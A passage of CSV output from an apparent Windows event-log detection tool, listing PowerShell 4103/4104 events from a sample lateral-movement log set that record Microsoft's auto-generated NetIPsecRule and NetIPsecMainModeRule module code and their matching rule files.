$__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv6Addresses')) { [object]$__cmdletization_value = ${IPv6Addresses} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv4Addresses')) { [object]$__cmdletization_value = ${IPv4Addresses} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; 
IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PassThru')) { [object]$__cmdletization_value = ${PassThru} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('SetPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Update-NetIPsecRule' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.082 
+09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.082 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.083 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.083 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Show-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service 
SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.083 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Find-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.084 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.084 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.085 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecRule"" 
ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.085 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.091 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.091 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Enable-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server 
activation and config.evtx +2021-04-22 19:19:38.092 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Disable-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.092 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Sync-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.092 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Update-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 
'root/standardcimv2/MSFT_NetMainModeRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] 
${MainModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; 
IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; 
ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'c",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeRule' 
$script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${MainModeCryptoSet}, 
